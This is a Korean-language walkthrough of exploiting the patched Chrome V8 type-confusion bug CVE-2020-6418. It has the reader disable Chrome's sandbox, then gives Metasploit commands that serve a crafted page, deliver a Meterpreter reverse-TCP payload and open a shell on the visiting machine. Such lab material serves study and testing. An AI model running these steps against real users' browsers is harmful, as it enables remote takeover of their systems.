
V8의 유형 혼동을 이용한 CVE-2020-6418용 익스플로잇으로, 조작된 HTML 페이지를 통해 원격 코드 실행을 가능하게 합니다. Metasploit을 사용하여 리버스 셸 페이로드를 전달합니다.
CVE 2020-6418은 Google Chrome의 V8 엔진에서 발생하는 타입 혼동(Type Confusion) 취약점입니다. 영향을 받는 버전은 80.0.3987.122 이전 버전입니다. 이 취약점은 원격 공격자가 조작된 HTML 페이지를 통해 대상 장치의 셸에 접근함으로써 악용될 수 있습니다.
참고: 익스플로잇이 성공하려면 Google Chrome 브라우저를 샌드박스 없이 실행해야 합니다.
i) Google Chrome 바로가기를 생성합니다
ii) 속성(Properties)을 클릭한 후 "Target" 옵션으로 이동합니다
iii) EXE 경로 끝에 공백을 추가하고 -no--sandbox를 입력합니다
iv) 적용(Apply) > 확인(Ok)을 클릭합니다
v) 새 Google Chrome 브라우저를 열면 아래와 같은 팝업이 표시됩니다.
지원되지 않는 명령줄 플래그를 사용하고 있습니다: -no-sandbox. 안정성과 보안이 저하됩니다.
익스플로잇을 수행하기 위해 Kali를 환경으로 사용하고 있으므로 Metasploit은 해당 배포판에 기본 내장된 도구로 제공됩니다. 하지만 다른 배포판을 사용하는 경우 익스플로잇을 시작하기 전에 Metasploit을 설정해야 합니다.
자세한 내용은 Metasploit 설치를 참조하세요.
i) Metasploit 프레임워크 시작
> msfconsole
ii) 익스플로잇 검색
> search chrome_js
iii) 위 출력에서 사용 가능한 익스플로잇 사용
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) SRVHOST IP 주소 입력
> set SRVHOST <ip address>
v) 타겟(Target) 지정 여기서 두 가지 옵션이 제공됩니다.
> set Target " Number "
vi) 페이로드(Payload) 설정
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) 현재 설정 및 활성화된 옵션을 확인합니다.
> show options
viii) 익스플로잇 실행
> run (or) > exploit
ix) URL이 제공되며, 세션을 활성화하려면 이 URL을 브라우저에 복사해야 합니다.
x) 사용자가 URL에 접근하면 세션이 생성됩니다. 이를 확인하려면
> show sessions
xi) 세션을 사용하여 사용자 시스템 정보를 확인하거나 셸에 진입할 수 있습니다.
> sessions <number>
> shell